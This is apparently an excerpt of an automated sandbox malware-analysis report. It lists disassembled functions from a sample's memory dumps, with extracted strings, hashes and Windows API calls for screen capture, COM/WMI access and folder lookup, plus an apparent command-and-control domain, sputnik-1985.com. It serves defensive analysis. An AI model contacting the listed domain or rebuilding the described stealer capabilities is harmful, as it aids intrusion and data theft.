`, xrefs: 0042422F
f, xrefs: 00423FEE
J, xrefs: 0042417C
F, xrefs: 00424160
2, xrefs: 00423FC6
>, xrefs: 00423F4E
D, xrefs: 0042416E
N, xrefs: 0042439E
x, xrefs: 004241FA
h, xrefs: 00424175
/, xrefs: 00423F46
r, xrefs: 004241B4
?, xrefs: 00423F42
h, xrefs: 0042424F
(, xrefs: 004241AD
^, xrefs: 00424128
X, xrefs: 0042411A
q, xrefs: 00423FDE
z, xrefs: 004241EC
~, xrefs: 00424208

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: &$&$($-$/$0$0$1$1$2$4$7$8$:$>$>$?$?$@$@$A$B$D$F$FF468920BFFA1172D0632DF0E28DC412$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$sputnik-1985.com$t$v$x$x$z$|$}$~
API String ID: 0-110374050
Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction ID: 27bd2a0d4c2ee2dbe7fab43400867feab0dee6ac78a78b22b0fd1ff9dbe20428
Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction Fuzzy Hash: 45026021D087D989DB22C67C8C483CDBFA11B63324F4843EDD5E86B3D6D6B90946CB66

Function 0084A756 Relevance: 54.1, Strings: 43, Instructions: 311COMMON

Download Yara Rule

Strings

e, xrefs: 0084A7F5
i, xrefs: 0084A811
}, xrefs: 0084A89D
K, xrefs: 0084A8FF
m, xrefs: 0084AA47
>, xrefs: 0084A9CB
C, xrefs: 0084A8C7
a, xrefs: 0084A9F3
:, xrefs: 0084A770
u, xrefs: 0084A865
n, xrefs: 0084AA4E
x, xrefs: 0084A79A
w, xrefs: 0084A873
L, xrefs: 0084A906
9, xrefs: 0084A7A8
i, xrefs: 0084AA2B
k, xrefs: 0084AA39
D, xrefs: 0084A762
+, xrefs: 0084A7C4
A, xrefs: 0084A8B9
o, xrefs: 0084A83B
G, xrefs: 0084A8E3
M, xrefs: 0084A90D
g, xrefs: 0084AA1D
E, xrefs: 0084A8D5
c, xrefs: 0084A7E7
c, xrefs: 0084AA01
q, xrefs: 0084A849
<, xrefs: 0084A9C2
g, xrefs: 0084A803
e, xrefs: 0084AA0F
o, xrefs: 0084AA55
I, xrefs: 0084A8F1
%, xrefs: 0084A78C
m, xrefs: 0084A82D
{, xrefs: 0084A88F
a, xrefs: 0084A7D9
y, xrefs: 0084A881
s, xrefs: 0084A857
3, xrefs: 0084A7B6
k, xrefs: 0084A81F
0, xrefs: 0084AB9D
=, xrefs: 0084A77E

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: %$+$0$3$9$:$<$=$>$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
API String ID: 0-1785674967
Opcode ID: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
Instruction ID: 93ddf491d8e31486af5845b34b0085aa2da473c4a0d390bbff755cded949e470
Opcode Fuzzy Hash: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
Instruction Fuzzy Hash: 85F160319086E98ADB36C63C8C443DDBFA15B52324F0847D9D0A9AB3D2C7754F86CB62

Function 0043A4EF Relevance: 54.1, Strings: 43, Instructions: 311COMMON

Download Yara Rule

Strings

a, xrefs: 0043A78C
>, xrefs: 0043A764
0, xrefs: 0043A936
g, xrefs: 0043A7B6
u, xrefs: 0043A5FE
}, xrefs: 0043A636
g, xrefs: 0043A59C
o, xrefs: 0043A7EE
m, xrefs: 0043A5C6
c, xrefs: 0043A580
e, xrefs: 0043A58E
m, xrefs: 0043A7E0
%, xrefs: 0043A525
{, xrefs: 0043A628
E, xrefs: 0043A66E
I, xrefs: 0043A68A
a, xrefs: 0043A572
q, xrefs: 0043A5E2
A, xrefs: 0043A652
i, xrefs: 0043A7C4
G, xrefs: 0043A67C
<, xrefs: 0043A75B
C, xrefs: 0043A660
:, xrefs: 0043A509
x, xrefs: 0043A533
k, xrefs: 0043A5B8
w, xrefs: 0043A60C
M, xrefs: 0043A6A6
i, xrefs: 0043A5AA
L, xrefs: 0043A69F
D, xrefs: 0043A4FB
y, xrefs: 0043A61A
=, xrefs: 0043A517
K, xrefs: 0043A698
+, xrefs: 0043A55D
3, xrefs: 0043A54F
9, xrefs: 0043A541
c, xrefs: 0043A79A
k, xrefs: 0043A7D2
n, xrefs: 0043A7E7
o, xrefs: 0043A5D4
s, xrefs: 0043A5F0
e, xrefs: 0043A7A8

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: %$+$0$3$9$:$<$=$>$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
API String ID: 0-1785674967
Opcode ID: 2f73bd405479f8443e137748fc13915d6267971bf3abd56322ba3364d03874fc
Instruction ID: 5a335782380f72e06434a0b7d1c84293c6c1cbd051fad8399b30b8532d7f13f9
Opcode Fuzzy Hash: 2f73bd405479f8443e137748fc13915d6267971bf3abd56322ba3364d03874fc
Instruction Fuzzy Hash: 0EF170319086E98ADB22C63C8C443DDBFB15B56324F0847D9D0A96B3D2C7794F86CB66

Function 00849B8A Relevance: 50.4, Strings: 40, Instructions: 391COMMON

Download Yara Rule

Strings

c, xrefs: 00849D6E
S, xrefs: 00849F8D
w, xrefs: 00849D7E
2, xrefs: 00849CBC
t, xrefs: 00849DC6
], xrefs: 00849D36
x, xrefs: 00849DE6
O, xrefs: 00849F7D
$, xrefs: 00849C4C
~, xrefs: 00849DA6
F, xrefs: 00849CFE
T, xrefs: 00849E36
r, xrefs: 00849E1E
=, xrefs: 00849C84
-, xrefs: 00849C14
e, xrefs: 0084A083
4, xrefs: 0084A066
<, xrefs: 00849C76
s, xrefs: 00849DB6
=, xrefs: 00849DF6
G, xrefs: 00849D3E
_, xrefs: 00849D26
Y, xrefs: 00849D4E
j, xrefs: 00849D86
{, xrefs: 00849DDE
H, xrefs: 00849D56
S, xrefs: 00849CF6
7, xrefs: 00849CD8
i, xrefs: 00849DD6
I, xrefs: 00849F75
U, xrefs: 00849D66
i, xrefs: 00849D96
5, xrefs: 00849C3E
j, xrefs: 00849D9E
Z, xrefs: 00849D5E
*, xrefs: 00849CE6
F, xrefs: 00849D2E
f, xrefs: 0084A08A
1, xrefs: 00849C22
=, xrefs: 00849C68

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: $$*$-$1$2$4$5$7$<$=$=$=$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
API String ID: 0-3597792095
Opcode ID: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
Instruction ID: c906db283c3d7f5a0a9442095e2d8d57fd924a821ed2d880db4f9a45c2e766a1
Opcode Fuzzy Hash: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
Instruction Fuzzy Hash: F42250219087EE89DB32C67C8C483CDBF616B67224F1843D9D4E86B3D6C7750A46CB66

Function 00439923 Relevance: 50.4, Strings: 40, Instructions: 391COMMON

Download Yara Rule

Strings

i, xrefs: 00439B6F
Z, xrefs: 00439AF7
I, xrefs: 00439D0E
Y, xrefs: 00439AE7
S, xrefs: 00439A8F
G, xrefs: 00439AD7
=, xrefs: 00439A1D
{, xrefs: 00439B77
s, xrefs: 00439B4F
e, xrefs: 00439E1C
x, xrefs: 00439B7F
7, xrefs: 00439A71
_, xrefs: 00439ABF
f, xrefs: 00439E23
4, xrefs: 00439DFF
], xrefs: 00439ACF
c, xrefs: 00439B07
F, xrefs: 00439AC7
j, xrefs: 00439B37
U, xrefs: 00439AFF
=, xrefs: 00439A01
w, xrefs: 00439B17
r, xrefs: 00439BB7
5, xrefs: 004399D7
H, xrefs: 00439AEF
<, xrefs: 00439A0F
*, xrefs: 00439A7F
2, xrefs: 00439A55
S, xrefs: 00439D26
j, xrefs: 00439B1F
t, xrefs: 00439B5F
=, xrefs: 00439B8F
T, xrefs: 00439BCF
O, xrefs: 00439D16
F, xrefs: 00439A97
-, xrefs: 004399AD
$, xrefs: 004399E5
i, xrefs: 00439B2F
~, xrefs: 00439B3F
1, xrefs: 004399BB

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: $$*$-$1$2$4$5$7$<$=$=$=$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
API String ID: 0-3597792095
Opcode ID: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
Instruction ID: be7a992d2d4842197a1748c1c2319ac7c28ec811ade833faf29c06d267706092
Opcode Fuzzy Hash: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
Instruction Fuzzy Hash: E8224F219087EA89DB32C67C8C483CDBFA15B67224F1843D9D4F86B3D6C7750A46CB66

Function 0084BAD7 Relevance: 32.4, APIs: 8, Strings: 10, Instructions: 880memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0084BF33
SysAllocString.OLEAUT32(37C935C6), ref: 0084BFAD
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0084BFEB
SysAllocString.OLEAUT32(37C935C6), ref: 0084C050
SysAllocString.OLEAUT32(37C935C6), ref: 0084C137
VariantInit.OLEAUT32(?), ref: 0084C1A5

Strings

:;$%, xrefs: 0084C553
F*R(, xrefs: 0084C091
#~|, xrefs: 0084BB04
e?^, xrefs: 0084BEB6
96, xrefs: 0084C0B9
[&h$, xrefs: 0084C099
#~|, xrefs: 0084BB0E
k"@ , xrefs: 0084C0A1
M, xrefs: 0084BDC2
n:T8, xrefs: 0084C0B1

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 65563702-2807872674
Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
Instruction ID: 43ada7c2d4998629931031ac9fce727ebe74aa64c929b5666174069785eb130e
Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
Instruction Fuzzy Hash: 9252EE726093408BD724CF28C8917ABBBE5FF86314F188A2DE595CB391D778D806CB56

Function 00436980 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 230windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00436989
GetSystemMetrics.USER32(0000004C), ref: 00436999
GetSystemMetrics.USER32(0000004D), ref: 004369A1
GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
DeleteObject.GDI32(00000000), ref: 004369C1
CreateCompatibleDC.GDI32(00000000), ref: 004369D0
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
SelectObject.GDI32(00000000,00000000), ref: 004369E7
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

Strings

Y, xrefs: 00436BEE

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
String ID: Y
API String ID: 1298755333-3233089245
Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B

Function 00425100 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 480COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243

Strings

,X*^, xrefs: 004253A3
%\)R, xrefs: 004253AB
C`<f, xrefs: 004253D3
+$e, xrefs: 004251F2
:@&F, xrefs: 00425393
XY, xrefs: 00425146
.T'j, xrefs: 004253BB
1D6Z, xrefs: 0042539B
]RB, xrefs: 00425257
?P:V, xrefs: 004253B3
+$e, xrefs: 00425165, 0042517A

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
API String ID: 237503144-2846770461
Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46

Function 00425D6A Relevance: 15.8, Strings: 12, Instructions: 778COMMON

Download Yara Rule

Strings

2E1G, xrefs: 00426876
qs, xrefs: 00425E96
T`Sf, xrefs: 0042638C
$@7F, xrefs: 0042633C
(X#^, xrefs: 00426350
uVw, xrefs: 00425EA0
&$, xrefs: 004266A0
-T,j, xrefs: 0042636E
8I>K, xrefs: 00426858
+\1R, xrefs: 0042635A
4D2Z, xrefs: 00426346
Wdz, xrefs: 00426396

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
API String ID: 0-2419925205
Opcode ID: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
Opcode Fuzzy Hash: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84

Function 008360B7 Relevance: 15.5, Strings: 12, Instructions: 458COMMON

Download Yara Rule

Strings

8I>K, xrefs: 00836ABF
uVw, xrefs: 00836107
+\1R, xrefs: 008365C1
qs, xrefs: 008360FD
T`Sf, xrefs: 008365F3
Wdz, xrefs: 008365FD
4D2Z, xrefs: 008365AD
(X#^, xrefs: 008365B7
2E1G, xrefs: 00836ADD
&$, xrefs: 00836907
$@7F, xrefs: 008365A3
-T,j, xrefs: 008365D5

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
API String ID: 0-2419925205
Opcode ID: 7f03e2cf2ff76769e2eca3cb1bafa80f1ab81eb052e5b20bbb5ada621e185149
Instruction ID: d8ae1a1cdcbffa54a06d4501a38a80f150e609fad83a6a3fb6cb5b362f4dd400
Opcode Fuzzy Hash: 7f03e2cf2ff76769e2eca3cb1bafa80f1ab81eb052e5b20bbb5ada621e185149
Instruction Fuzzy Hash: 46423CB0905369CFDB64CF56D981BCCBBB1FB45300F1185E8C18A6B262DB748A86CF84

Function 00829AA7 Relevance: 14.9, APIs: 2, Strings: 6, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00829F4E
FreeLibrary.KERNEL32(?), ref: 00829F8B

Strings

SP, xrefs: 00829E59
if, xrefs: 00829D83
~|, xrefs: 00829D95
vt, xrefs: 00829D63
tj, xrefs: 00829E21
pv, xrefs: 00829E19

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: ~|$SP$if$pv$tj$vt
API String ID: 3664257935-1422159894
Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
Instruction ID: 1a3fd82454e665a2b1eb764f739ab16d9c9b0084f04a1fc9321a365b4299d646
Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
Instruction Fuzzy Hash: F7620670608360AFE728CB28ED8172BB7E2FF95314F18862CE4D5D7291D771AC858B56

Function 00419840 Relevance: 14.9, APIs: 2, Strings: 6, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419CE7
FreeLibrary.KERNEL32(?), ref: 00419D24

Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Strings

vt, xrefs: 00419AFC
~|, xrefs: 00419B2E
pv, xrefs: 00419BB2
if, xrefs: 00419B1C
SP, xrefs: 00419BF2
tj, xrefs: 00419BBA

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: ~|$SP$if$pv$tj$vt
API String ID: 764372645-1422159894
Opcode ID: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
Opcode Fuzzy Hash: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A

Function 00417405 Relevance: 13.4, APIs: 4, Strings: 3, Instructions: 1110COMMON

Download Yara Rule

Strings

~, xrefs: 00418158
O, xrefs: 00417625
5&'d, xrefs: 004175E5

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 5&'d$O$~
API String ID: 0-1622812124
Opcode ID: eb213bdff85b4a2e4d6844bfd16b8efcb37f0a606e6fff5fc883d1a75d116a88
Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
Opcode Fuzzy Hash: eb213bdff85b4a2e4d6844bfd16b8efcb37f0a606e6fff5fc883d1a75d116a88
Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A

Function 0081D7AC Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00846BE7: GetDC.USER32(00000000), ref: 00846BF0
Part of subcall function 00846BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 00846C11
Part of subcall function 00846BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 00846C21
Part of subcall function 00846BE7: DeleteObject.GDI32(00000000), ref: 00846C28
Part of subcall function 00846BE7: CreateCompatibleDC.GDI32(00000000), ref: 00846C37
Part of subcall function 00846BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00846C42
Part of subcall function 00846BE7: SelectObject.GDI32(00000000,00000000), ref: 00846C4E
Part of subcall function 00846BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00846C71

CoUninitialize.COMBASE ref: 0081D7BC

Strings

sputnik-1985.com, xrefs: 0081DB71
|qay, xrefs: 0081D8A8
?C*], xrefs: 0081DA0B
&W-Q, xrefs: 0081DA20
~wxH, xrefs: 0081D8B6
9Y, xrefs: 0081DABB

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$sputnik-1985.com$|qay$~wxH
API String ID: 3248263802-1016125510
Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction ID: 95c7b3474ab2bc87fd1fee98b921cf4c00d1421c2ece2e2110ad5f18658a0a05
Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
Instruction Fuzzy Hash: C1B105756047818BE725CF2AC4D07A2BFE2FF96304B18C5ACD4D68BB46D738A846CB51

Function 0040D545 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

CoUninitialize.OLE32 ref: 0040D555

Strings

|qay, xrefs: 0040D641
?C*], xrefs: 0040D7A4
9Y, xrefs: 0040D854
sputnik-1985.com, xrefs: 0040D90A
~wxH, xrefs: 0040D64F
&W-Q, xrefs: 0040D7B9

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
String ID: &W-Q$9Y$?C*]$sputnik-1985.com$|qay$~wxH
API String ID: 3213364925-1016125510
Opcode ID: fc5ff244476e8ce422fc6bf60f521c54b7b762fd82f6f5220f24f5c6609ee6f3
Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
Opcode Fuzzy Hash: fc5ff244476e8ce422fc6bf60f521c54b7b762fd82f6f5220f24f5c6609ee6f3
Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95

Function 0082C667 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

,X0^, xrefs: 0082CB72
C`6f, xrefs: 0082C9A3, 0082CE18, 0082CEE4
C`6f, xrefs: 0082CB80
,\/b, xrefs: 0082CB79
*H%N, xrefs: 0082CB56
2T'Z, xrefs: 0082CB6B
+P%V, xrefs: 0082CB64
4D"J, xrefs: 0082CB4F

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
Instruction ID: 2dd4fa30bcb4ca20c11a624cff2587ce46642d11311e6ecbdcd72ae0487d480d
Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
Instruction Fuzzy Hash: 84323AB19003218BCB24CF28C8927BBB7B2FF95314F29825CD8519F795E775A942CB91

Function 0041C400 Relevance: 10.8, Strings: 8, Instructions: 842COMMON

Download Yara Rule

Strings

,\/b, xrefs: 0041C912
4D"J, xrefs: 0041C8E8
*H%N, xrefs: 0041C8EF
2T'Z, xrefs: 0041C904
C`6f, xrefs: 0041C73C, 0041CBB1, 0041CC7D
C`6f, xrefs: 0041C919
+P%V, xrefs: 0041C8FD
,X0^, xrefs: 0041C90B

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
API String ID: 0-102253164
Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5

Function 00818AE7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00818B0B
GetCurrentThreadId.KERNEL32 ref: 00818B15
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00818BBC
GetForegroundWindow.USER32 ref: 00818BD1
ExitProcess.KERNEL32 ref: 00818D1E

Strings

6W01, xrefs: 00818C1C

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
Instruction ID: 71b0a554f66cc8be96a4c60744bc4735266eb76c31f19d3e7130125a4da7e5f6
